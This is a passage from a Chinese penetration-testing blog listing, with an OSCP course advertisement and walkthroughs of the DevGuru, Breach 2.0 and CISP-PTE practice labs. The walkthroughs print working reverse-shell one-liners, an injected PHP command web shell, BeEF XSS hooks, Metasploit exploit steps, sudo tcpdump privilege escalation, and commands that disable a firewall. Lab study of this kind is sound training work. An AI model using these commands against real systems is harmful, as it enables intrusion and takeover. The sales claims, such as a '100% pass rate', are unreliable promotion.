首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
9,904 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,561 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,757 阅读
4
几个常见的密码字典推荐
3,968 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,433 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
8
篇与
的结果
2026-04-11
泷羽Sec红队培训,OSCP+国际渗透测试专家中级认证
泷羽 Sec 团队专注红队教学与 OSCP 培训,在 B 站免费提供从基础到内网渗透的课程,适合各类学习者。团队的泷老师是资深红队队长,持有 OSEP、CISSP、OSCP 等高含金量证书,教学有保障。课程分析是一个以OSCP 实战与证书通过为目标,兼顾红队实战技巧与攻防思维的系统化培训。课程由理论课件(20 章 PDF)+ 大量逐日/逐机实战视频(day1–day72 等靶机/专题)组成,形成“知识讲解 → 工具演示 → 靶机实操 → 复盘总结”的闭环训练体系。覆盖范围:从基础信息收集、端口/服务扫描、Web/SQL 注入、客户端攻击、密码学、到本地提权(Windows/Linux)、端口转发与隧道、免杀、Metasploit、Active Directory(AD)枚举与高级域攻击(Kerberoast、AS-REP、票据伪造、DCSync 等)、横向移动、持久化,以及综合靶机演练与考证策略。实战资源:视频目录包含大量实操靶机,覆盖单机与域环境、应用漏洞与二进制漏洞、容器与特殊平台(Node)等真实场景。教学逻辑:讲解工具原理与命令(例如 nmap、gobuster、Burp、msf、mimikatz、BloodHound、socat、chisel、dnscat2、hashcat 等),再以视频靶机练习验证与巩固,最后通过“组合模拟攻击”训练完整攻防链路。课程亮点(为什么值得学)体系齐全、衔接明确:从入门到域渗透、从漏洞利用到免杀,课程覆盖 OSCP 考试和实战常见能力点。大量靶机练习:视频库丰富,实战场景真实,便于把理论迅速落地。工具和命令详尽:每章均有具体命令与工具用法示例,便于学员复制复现。重视提权与域攻防:Windows/Linux 提权、AD 认证攻击与横向移动讲解详尽,是通过高级靶机与企业级模拟的关键能力。实战闭环训练:第19/24章将技术串联为完整攻防流程,适合考试演练与项目实战。课程说明(面向谁、学完能做什么、考证对接)面向人群想通过 OSCP 或提升渗透测试实战能力的学员。有一定 Linux/网络基础,或愿意投入时间补基础的进阶学习者。企业安全人员、红队/蓝队工程师、CTF 选手希望系统化提升实战技能者。前置要求熟悉 Linux 基本命令、Windows 基本管理操作。对网络协议(TCP/IP、HTTP、DNS)有初步理解。基本编程或脚本能力(bash、PowerShell、Python)有助于快速吸收。学习目标(学完后你能)独立完成一次单机靶机的完整渗透测试:信息收集 → 漏洞利用 → 本地提权 → 清理痕迹。在有权限的企业 AD 环境中进行枚举、Kerberoast/AS-REP 等认证攻击、票据/传递/横向移动并可能获取域控(仅限授权实验室)。使用常用渗透工具(nmap、Burp、sqlmap、msf、mimikatz、BloodHound、socat、chisel 等)并能根据现场情况灵活组合。修改和调试 exploit、生成与混淆 payload(基础免杀)、在被防护环境下做端口转发与隧道穿透。针对 OSCP 考试场景掌握应试策略(如实操习惯、复盘方法、时间与任务分配、工具限制下的手工技巧)。与 OSCP 的对接课程重点与 OSCP 常考点高度一致:手工漏洞利用、提权、内网横向、复盘报告写作等。课程中的大量OSCP专属靶机视频非常适合 OSCP 的练习与模拟考试。注意 OSCP 考试要求的道德与授权差异:考试环境只允许对授权靶场/练习机使用,不允许攻击真实无授权目标。课程主讲:泷老师前高级红队队长配合公安打过多起案件,7年红队经验目前任职某知名安全大厂红队持有OSEP,CISSP,OSCP国际渗透测试顶级认证证书,有望冲刺OSCE3曾多次带队拿下国护前三名课程助教白小羽,泷羽Sec作者:V:baibaixiaoyu2024关于通过率目前针对于已经报名OSCP+ 官方offsec考试的学员是100%通过率,我们团队有师傅精通免杀,有师傅精通src,有师傅精通红队渗透,有师傅全栈前后端开发,各有所长3999元只是我们认识的开始,服务永不停止最新OSCP+认证课程大纲下载地址下载地址学员对我们的评价另外我们并不鼓励我们的学员贷款或者找别人借钱上课或者考证,能白嫖尽量白嫖下面是一位我们学员在龙老师的指导下在校就通过osep认证的学员,一对一的就业推荐下面是招聘方视角通过我们指导拿下offer数不胜数了,这位是我们的”大师兄“,目前在北京实习关于hvv我们也有靠谱的渠道,不用担心去当免费劳动力关于自媒体,若您发布的文章很有价值,我们会帮您转发您的文章以及作品/工具。。。。。。。。。。。等等案例就不放出来了3999,只是我们认识的开始,服务用不停止,泷羽Sec安全团队唯一官网,https://longyusec.com
2026年04月11日
1,692 阅读
0 评论
0 点赞
2025-09-11
Devguru-vulnhub靶机渗透,oscp之路
地址:https://www.vulnhub.com/entry/devguru-1,620/发布日期:2020年12月7日 缺陷:中级(取决于经验)目标:获得user.txt与root.txt并获得root权限运行:VMware Workstation 16.x Pro(默认为NAT网络模式,VMware比VirtualBox更好地工作)描述:DevGuru是一家虚构的web开发公司,雇用您进行pentest评估。您的任务是在他们的公司网站上查找漏洞并获取root。OSCP类~基于现实生活常规操作,我们使用arp-scan -l进行内网主机探测,然后用nmap端口扫描工具进行端口扫描,发现80端口开放之后使用dirsearch进行目录扫描访问我们的80端口经过目录扫描之后发现了一个adminer数据库管理工具我们访问8585,同样也是http服务,在尾部查看到了这个系统的版本使用searchsploit检索漏洞,发现一个远程代码执行漏洞这里我们需要用到一个工具GitHack,前面通过dirsearch扫描到了一个.Git这个时候我们就能用Githack找到源代码https://github.com/go-gitea/gitea/releases?page=12python GitHack.py http://10.10.10.226/.Git/查看源码这里能看到3306mysql数据库的账号密码回到刚刚的数据库管理工具adminer登录,发现了账号密码我们是cmd5进行解密,解密失败了既然破解不了,那么我们新增一个用户啊,不过要注意这里分组id需要设置为2我们再去分组表,新增一条数据,将这个用户id和分组id配合上将刚刚的用户id,添加到这里来找到这个后台地址(使用dirb能扫描出来),这样我们就能登录了我们找到这个home下面,修改代码function onStart(){ $this->page["PoisonVar"] = system($_GET['cmd']);}并调用这个函数{{ this.page.PoisonVar }}尝试利用这个代码,访问主界面进行传值,是可以正常执行命令的我们看看有没有python,看到python是3.6.5版本这里我们直接执行这条python的反弹shell命令,并开启监听,反弹shellexport RHOST="10.10.10.130";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'我们使用featherscan内网特权提升工具,进行信息收集,并没有发现可以直接提权的命令,这个工具最新版需要在泷羽Sec的freebuf帮会获取,4.5版本已经放在了Githubhttps://Github.com/baibaixiaoyu2024/FeatherScan/随后我们在这个文件里面找到了另一个数据库的密码,就是8585端口的那个系统的配置文件里Gitea:UfFPTF8C8jjxVF2m登录看看再去解密,解密失败那么还有一个思路是不是,我们可以直接修改它默认的用户密码,不用去新增用户了,我们需要使用 bcrypt 加密算法,对123456进行加密,将hash内容填到密码这随后我们登录这个后台http://10.10.10.226:8585/user/login登录成功了找到这个 settings 之后去修改代码内容在尾部添加一个bash -c "exec bash -i >& /dev/tcp/10.10.10.130/1234 0>&1"之后我们随便编辑一个文件,加一点内容,任何内容都行点击保存按钮监听方就能收到shell的回弹了创建一个交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'我们使用sudo -l的时候看到了一个sqlite3数据库命令可以使用,提权利用网站查找:https://gtfobins.github.io/那么我们尝试使用sudo+sqlite3进行提权,但是我们没有密码,提权不了呀,后面发现了sudo版本为1.8.21p2再找找sudo的利用漏洞发现可以使用特殊符号进行绕过那么我们就在原先的那个命令添加进行绕过就好了,提权一切顺利,至此靶机结束全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,Git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年09月11日
1,589 阅读
0 评论
0 点赞
2025-09-11
Breach2.0-vulnhub靶机渗透,oscp认证之路
下载链接如下:https://www.vulnhub.com/entry/breach-21,159/首先靶机的IP是固定的 192.168.110.151 IP地址,nat网络也要是110段,不然扫描不出来IP地址首先我们使用nmap进行端口扫描,ssh服务换到了65535端口这个时候没有开启80端口,我们尝试连接一下ssh发现了账号密码 peter / inthesource,我们登录一下发现自动断开了连接回头却发现80端口开启了靶机当然要第一时间查看源码撒随后使用目录扫描扫描出来一个blog对搜索框尝试SQL注入xss尝试成功<script>alert(111)</script>接下来打开beef-xss,注意如果遇到了beef-xss下载不了,或者使用不了的话,我们要把他重新下载apt remove rubyapt remove beef-xssapt-get install rubyapt-get install ruby-dev libpcap-devgem install eventmachineapt-get install beef-xss这里会先让你输入密码等待几秒后就会自动打开浏览器,输入账号密码,默认用户为 beef ,密码为你刚刚启动beefxss输入的密码将下面的payload填入这个搜索框<script src="http://127.0.0.1:3000/hook.js"></script><script src="http://192.168.110.128:3000/hook.js"></script>这里需要耐心等待几分钟,靶机就能上线了,发现靶机的火狐浏览器版本是15.0,靶机是设置了自动执行这个xss,实际情况需要利用社会工程学使用漏洞检索工具searchsploit检索这个版本浏览器的漏洞,发现可以使用MSF那么打开MSFMSFconsolesearch firefox 15.0use 0设置好配置项use exploit/multi/browser/firefox_proto_crmfrequestset SRVHOST 192.168.110.128set URIPATH shellshow payloadsset payload 3将生成的结果http://192.168.110.128:8080/shell填到这个里面这样子就能执行命令了,但是呢,就立马断开了,这个shell很不稳定,所以我们需要创建一个稳定的shell,使用MSF的post/multi/manage/shell_to_meterpreter模块use post/multi/manage/shell_to_meterpreterset session 1创建交互式终端python -c "import pty;pty.spawn('/bin/bash')"我们的80端口默认是访问不了的,需要使用ssh连接一下,才开启的80端口cat /etc/sshd_config注意不是ssh_config,他俩还是有一定区别的特征sshd_configssh_config作用对象SSH服务器端(sshd服务)SSH客户端(ssh命令)主要配置位置/etc/ssh/sshd_config/etc/ssh/ssh_config(全局)或~/.ssh/config(用户)生效方式修改后需重启sshd服务每次执行ssh命令时读取配置目标控制服务器如何响应连接控制客户端如何连接服务器关键配置项端口、认证方式、用户访问控制等端口、私钥路径、用户名、主机别名等只有peter才能登录,并且登录成功后会执行/usr/bin/startme那么到这就已经很清楚了,为什么连接了一下ssh它的80端口就开启了我们来看看他的权限,其他用户不能写,只能root用户写,那么这种提权方式就不能使用了只有当以peter身份成功通过SSH登录时,阿帕奇服务才会被启动,80端口也会随之开启。这主要是由于存在ForceCommand设置。在执行完/usr/bin/startme命令后,SSH会话就会结束。由于没有提供一个能够持续运行的交互式Shell,所以SSH连接会立即断开。echo "exec sh" > .bashrc这样子就能使用ssh连接了既然是有密码的,那么我们可以直接sudo,发现能利用的只有apache2继续信息收集,找到web所在的目录/var/www/html,blog里的配置文件密码为空我们登录进去查看表数据,却只得到了我们利用xss登录进来的代码,没有什么用mysql -uroot -p# 不用输入密码 直接回车这里我们切换另一个数据库看看,也就是/var/www/html2下面的这个cms,得到管理员密码,32admin,可能有用,退出来换root(失败)在端口信息收集的时候,看到一个不常见的端口,使用telnet连接的时候却输出了一对经纬度利用谷歌浏览器进行导航,发现一个位置,那么这个位置可不可能是管理员密码呢?答:可能,但是登录失败。。。。。。直到我利用telnet登录这个2323端口,才有了新的突破,他问了一个问题,订书机是谁的?我们需要在目录下寻找关键词staplercd /usrgrep -rno stapler在结果中看到一个/usr/local这个目录下通常包含了本地安装的软件,这里我们看到一个cd.py为什么是/usr下面的文件,而不是其他的地方找?答:其他目录也可以,这里只是忽略掉了找的过程,比如/var下面的所有文件只有一个index.html包含stapler字符,并没有利用价值。此时就可以正常输出 Woot 啦!而且用户也切换成功我们来看看网络的端口,包含了8888端口,而且是tcp协议测试,这不是html嘛访问,目录下面有一个oscommerce点进去看看,又是一个cms看看后台目录在哪前面我们看了这个数据库的密码,admin / 32admin,却也禁止登录了我看了看网上的wp,是需要指定cms的密文解密而我这。。。。。。无奈只能凑合登录登录了,当然也可以爆破我们找到这个目录,普通用户可以读写我们使用weevelywebshell连接工具生成一个免杀马上传上去但是我们打开这个免杀马的时候,里面没有任何内容(可能是文件传输过程中出错了)并且shell也连不上那么就换一种方式,用kali自带的webshell进行反弹,我们修改好这里的ip地址喝端口为kali监听的地址和端口下面找到这个shell.php,访问即可反弹成功反弹成功我们试试sudo -l,发现它不用我们直接输入密码,有一个tcpdump提权我们找到当前的网卡信息依次执行命令就好COMMAND='id'TF=$(mktemp) # 一个临时文件路径echo "$COMMAND" > $TF # 追加要执行的命令到上面那个文件chmod +x $TF # 赋予执行权限sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root# 注意这里 ⬆ 是你需要监听的网卡地址# 即可提权执行命令提权执行命令的时候,使用bash,他反弹不成功,我们可以利用刚刚上传上去的php文件进行反弹执行命令的同时,反弹成功,是root权限,提权成功感谢观看结束的小师傅们全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐内网渗透,流量转发Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透一个永久的渗透知识库
2025年09月11日
1,200 阅读
0 评论
0 点赞
2025-05-20
什么是OSCP国际渗透测试专家中级认证?
一、OSCP认证是什么?首先介绍下OSCP认证,目前安全技术类的证书有很多,像是CEH,Security+,CISSP等等。除了众多侧重于笔试的安全认证,OSCP(Offensive Security Certified Professional) 是为数不多得到国际认可的安全实战类认证。目前在国外受到广泛认可,在台湾、香港等地区也比较流行,国内刚刚起步,拿到认证的还不是很多,主要集中在安全企业和审计公司。官方介绍:https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/OSCP认证,是一个专门针对Kali Linux渗透测试培训课程的专业认证。该认证机构声称,OSCP认证是一个区别于所有其它认证的考试,考试全程采取手动操作的方式,而不设笔试环节。认证条件:无考试形式:OSCP的认证考试也是另类的存在,考生拥有24小时的时间(实际是23小时45分钟)去完成考试,具体如何分配时间由考生自己决定。题目是5台主机(随机抽取),目标是攻入并拿到最高权限(ROOT/SYSTEM)。基于难度级别,成功执行的攻击会获得相应的积分。24小时结束之后,你还有24小时去完成并提交考试报告(需要详细说明攻击步骤和里程碑截屏来证明确实攻破并获得相应权限)。考试费用:$800美元(30天实验室访问+认证)当然也有更多时长的实验室访问套餐,详情如下,具体选哪个可根据自身情况自行选择:二、课程内容有哪些?OSCP的整个课程还是比较体系化的,涵盖了渗透测试中的大部分内容,内容包括:被动信息收集、主动信息收集、漏洞扫描、缓冲区溢出、Win32缓冲区溢出攻击、Linux缓冲区溢出漏洞、漏洞利用、文件传输、提权、客户端攻击、WEB应用攻击、密码攻击、端口重定向和隧道、Metasploit框架、免杀、渗透测试实战演练等。整个知识框架还算完整,但其中的web应用攻击和缓冲区溢出部分内容感觉还是不够深入,与国内的教程比起来略显简单。web渗透中并没有各种绕过waf的奇淫巧技,缓冲区溢出部分也没有突破系统的各种防护手段……三、学习方式是怎样?目前官方推荐自学,官方会提供教材(约350页的PDF教材)和教学视频(约8小时的mp4视频)以及为学员提供的交流论坛和在线的lab实验室环境。注册、约定lab时间并付款后,官方会在lab开始那天邮件你教材和视频文件的下载链接,并开通论坛账号及实验环境vpn链接,你就可以学习教程并链接lab环境进行实验练习了。其中注册环节可能会遇到一些坑,这里就不细说,可以参考《OSCP认证教程第一集:注册教程》文章。通过自学教程你会掌握渗透测试中的大部分基本技能,在通过lab环境下的实战靶机练习将理论练习实际会对学习的知识有更深入的理解。其中lab环境下大概有53台靶机,靶机上预置了有漏洞的程序或者服务,你需要通过运用教程里学到的技能来获得服务器的最高控制权,并在靶机里获取proof.txt文件。我在买的是30天的ab实验,然而由于一些个人原因并没有投入大量时间,靶机做了20多台。但基本了解了lab环境和漏洞发现及利用的方法。个人认为做练习只是一方面,掌握方法才是学习的关键,因为漏洞是不断出现的,题目是永远做不完的,只有掌握原理及方法才是关键。当然如果有时间还是要尽量多做些lab的,毕竟是花了钱的哈。四、怎么考试呢?通过30天的lab学习后我约了考试,约考的链接会在之前官方发你的邮件中有。我是lab结束后才开始约考的,约考的时候才发现考试空挡已经排到了3周以后……早知道应该提前把考试时间约好,因为刚做完lab的时候状态是最好的,过个3周有些内容已经开始慢慢忘记……考试是在线进行的,并且有视频监考。具体来说就是你在约定的考试时间会收到官方的邮件,会给你一个考试环境的vpn连接文件,使用方法与lab的一样,并告诉你考试题目的IP地址(一般会是5台目标机器),题目满分是100分,70分通过。考试之前是要进行身份确认的,会通过摄像头进行身份的确认,所以你要准备好护照(为什么是护照呢?因为官方会要求政府颁发的、有照片的、英文的证件,国内符合要求的也只有护照了),身份验证后就可以vpn连接考试环境了。我约的是早上8:00的开始,早早的就起来做好了准备,7:45准时进行身份确认,其中遇到了网络不稳的情况,官方那边一开始一直看不到我这边的摄像头,重启了下家里的路由器就好了(也有小伙伴用4G手机热点开始的,因为部分地区的小区宽带连不上考试环境),然后vpn连接进考试环境,网络还算稳定,忙乎到8:30才算正式开始考试答题。我先选择了一道25分的缓冲区溢出的题目,花了大概2个小时,总算完成了poc的编写,拿到了shell,一看还是system权限,稳稳的拿到了proof.txt。其中遇到了一点小波折就是badchars漏了一个字符的,碰巧shellcode里有用到了这个字符,反复调试了好几遍才发现。不过还好没有ASLR、DEP等机制需要破,所以OSCP里面的漏洞挖掘还是比较基础的,因为真正的挖掘是在OSCE认证里,这也是我下一步要搞定的认证啦。解完这道理就有点饿了,然后和监考说了下休息半小时,吃了点水果。从考试开始不光是有摄像头监控的,我们的电脑屏幕监考也是可以看到的,所以当我们离开摄像头,桌面停止操作的时候是要和监考说一下的。半个小时后回来,在和监考打个招呼,发现监考的昵称换了,估计是几个人轮流监考……监考确认好后继续答题,选了另一个25分机器,很快通过一个web程序漏洞拿到了shell,但是只是user权限,找了很多本地提权的exp都没打成功……思路卡住了,果断换了一道10分的,看分值我以为应该是一个送分的题,结果真的是没那么简单,各种枚举都没发现问题,这时候心里有点慌,想换下一道但有不甘心,重新整理思路,重新扫描分析,折腾到傍晚才通过一个服务漏洞拿到了shell,正在我担心要怎么提权的时候,一看是root权限,顿时心情好了很多。到这里已经做出了两道半题目,算了下应该最少有45分了。在做缓冲区溢出的时候,为了节省时间我同时开了nmap跑其他机器的端口信息,简单看了下剩下2台的信息后实在太困了,和监考说了下,就去睡觉了,我还特意问了下去睡觉的话可不可以关机,监考说没问题,我就关了摄像头和电脑,定了闹钟睡了5个小时。醒来先是看了剩下的2个机器,一个隐蔽的web程序可以拿到shell,不出所料是个use权限,又是提权,搞了好久还是没搞定。剩下1台各种尝试,未果……2台20分的机器,我只拿到10分……算了下分数25+10+10+12.5=57.5,于是回过头来做前面那个25分的提权,各种百度无果,无聊中换成谷歌试试,结果还真有意外出现,找到国外一篇文章,研究了下,改了改利用代码,欧耶,成功拿到了system权限。稳了稳心情,默默的计算了下应该正好70分了,一看时间已经到了早上5:00,还剩将近3个小时,因为担心后面写英文报告会被扣分,所以还是想再拿些分数才放心。想到考试指导上说有一次使用msf的机会,想着应该是哪台机器会用得上,我就纠结了,用在那个提权上还是剩下那台呢?最后选择用在最后那台20分的机器上,各种漏洞自动过了一遍……没结果,后悔没写练习和lab的报告了(提交练习和lab报告会给加5分的)。看了下时间,已经没多少时间了,整理下了截图,并确认了下所有提交的proof.txt,然后和监考确认考试结束。这种24小时的考试真的是精疲力尽,又再次确认了下截图,每个flag的截图都有ipconfig或者ifconfig,关键步骤都有截图……然后就放心的睡觉了,因为还有24小时的时间要写一份英文的报告,这是考试的最后一步,也是我最薄弱的部分,睡醒了按照官方的模板,把握做出来的三个半机器的渗透过程都写了出来,当然是用最简单的语法和单词,主要全依赖了谷歌翻译,全篇都是短句,因为截图比较多,通篇用的最多的就是like this然后下面放上截图。整理完报告发现居然写了60多页,最后做成pdf压缩,上传到官方给的url,再把下载连接发给官方指定邮件。报告发送后24小时内会收到一封时间,告诉你已经收到你的报告,5个工作日内将告诉你开始结果。然后我等了5个工作日,在第6个工作日的上午收到了邮件:五、考试难不难?个人认为OSCP还是模拟实战渗透的,不像那些CTF需要各种脑洞大开。如果你在工作中就是做渗透测试的,那应该算是中等难度,如果是初学者,我建议还是需要认真的学完教程,并在lab环境中拿到30台以上的靶机。缓冲区溢出部分难度不大,教程和考试都是属于比较基础的难度。对于我个人来说,提权比较头疼,因为考试之前我也做了准备,网上找了各种提权一条龙的工具包,考试的时候用了发现就是一条虫啊,派的上用场的不多,所这部分还是要多积累,多做练习。总体上来说难度适中,毕竟70分就可以通过。六、备考有什么建议?a.学好英文很重要。不管是报告还是网上查资料,都需要英文的读写能力,如果英文好会有很大帮助。(虽然后来我也有和官方沟通,对于非英语母语的考生报告里的语法和单词错误是不会扣分的。)b.学习的时候要做笔记。考试的时候由于紧张会很容易手忙脚乱,所以提前做好学习笔记很重要,没有思路的时候可以看下笔记也许就有新的发现。c.练习和lab报告。在lab练习期间最好把练习和lab中靶机的渗透过程写成报告,官方说提交练习和lab靶机10台不同漏洞利用的报告会在最终考试成绩上加5分,虽然分数不多,但在关键时候就是救命稻草了。d.多交流。官方也有交流的渠道,如论坛、IRC,当然需要英文沟通了,所以我在这方面就……你们多努力吧。七、哪些好的资料可以分享?我在学习和备考的时候参考的一些不错的资源,汇总如下:注册指南:《OSCP认证教程第一集:注册教程》Linux提权指南:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/Windows提权辅助脚本:https://github.com/pentestmonkey/windows-privesc-check模拟练习平台(跟Lab环境类似):vulnhub、hacktheboxbadchars工具:https://github.com/mgeeky/expdevBadChars还有就是github上可以搜索“OSCP”找到很多资源,但是每个人的基础不一样,别人总结的不一定适合你,建议大家还是多多总结多多交流。——本文转载自freebuf作者:安全圈套的套哥如果有师傅们想要考取这个认证,并且无从下手,或者没有信心,我们提供一对一的专家咨询,以及我们的OSCP培训课程3999元的限时优惠价,在校生立减500元,也就是3499元既可以获得7年红队,OSEP国际渗透测试专家高级认证的一对一教学服务
2025年05月20日
1,977 阅读
0 评论
0 点赞
2025-05-18
CISP-PTE综合靶场解析,msf综合利用MS14-058【附靶场环境】
CISP-PTE综合靶场解析,msf综合利用MS14-058【附靶场环境】前言需要靶场的朋友们,可以在后台私信【pte靶场】,有网安学习群,可以关注后在菜单栏选择学习群加入即可信息收集题目要求:给定一个ip,找到3个KEY。nmap扫描,为了节省时间,这里改了端口,就不使用-p-全端口扫描了,源靶机在20000+端口扫描到这个端口进行访问御剑扫描有爬虫协议访问后台首页看看有没有git泄露,报了个iis报错界面,iis有web.config看看有没有备份文件,嗯,很好打开,看到了账号密码用sqlserver连接不知道为什么应该是系统问题使用pycharm专业版连接,指定好数据库,主机,账号,端口,密码后台回复【激活】即可获取 pycharm专业版 激活到2099的激活工具(仅限windows)有4张表找到管理员密码登录就好,找到了第一个keyweb漏洞利用文件上传,a都上传不了,说明是白名单,换思路这里开始分析这里我们看到这个管理上传文件,有一个aspx文件下载下来看看,这不是一句话木马嘛访查看源码问这个文件传参试试蚁剑连接查看系统信息查看系统配置,改密码,没有权限我们返回web目录,有一个key2key.key这个就是第二个key后渗透我们打开kali,并配置好桥接模式生成后门,并把这个payload记好,便签即可打开msfconsole,使用这个模块multi/handler由于生成的木马文件在kali里面,kali没有蚁剑,这时候我们就将后门传到本机,然后由本机传到靶机上,python3开启http服务本机访问这个kali的IP地址,这时候如果出现页面不可访问,那么大概率是防火墙没有放行8888端口,需要在kaili放行8888端口,命令参考sudo ufw allow 8888/tcp下载下来后,用蚁剑传文件到目标靶机上使用web虚拟shell执行后门反弹shell成功获取系统信息,没有权限提权1、ms14-058成功上线后,使用bg维持会话的同时继续执行其他模块,可以看到bg之后会生成一个session,记住这个session,使用search windows/local/ms14_058搜索模块,use 0指定payload模块为搜索到的第一个结果,使用ms14_058模块的时候,需要设置这个session为你刚刚上线成功的session,否则会导致执行不成功,run这里遇到个问题端口配置不正确该站点存在此漏洞,但是shell会话建立不成功,这个时候就是你的端口配置不对了,必须要是你msfvenom后门使用模块的指定端口,不然都会不成功重新设置端口为msfvenom设置的端口,网上大多数教程都没有详细介绍,只是走个过场,我自己也试过很多坑,才发现可以看到,提权成功了,使用hashdump查看用户hash密码解密hash密码开启3389远程连接run post/windows/manage/enable_rdp我们去网站根目录,还发现有个bak文件,2022-12-12打开,既然是我们sqlserver数据库超级管理员账户和密码利用这个sa账户,关掉防火墙用到 admin/mssql/mssql_exec模块执行成功,如果不关闭防火墙的话可能导致远程连接连接不上打开桌面2、手工得知sa账户密码后,使用sa登录获取系统命令,这时候发现,sa拥有system系统权限关闭防火墙netsh firewall set opmode mode="disable"开启3389远程连接wmic rdtoggle where servername="%computername%" call setallowtsconnections 1开启3389成功,在这里虽然没有用户密码,但是可以新建用户,然后远程登录,这里还有另外一种方法直接在命令行查找key
2025年05月18日
1,189 阅读
0 评论
0 点赞
1
2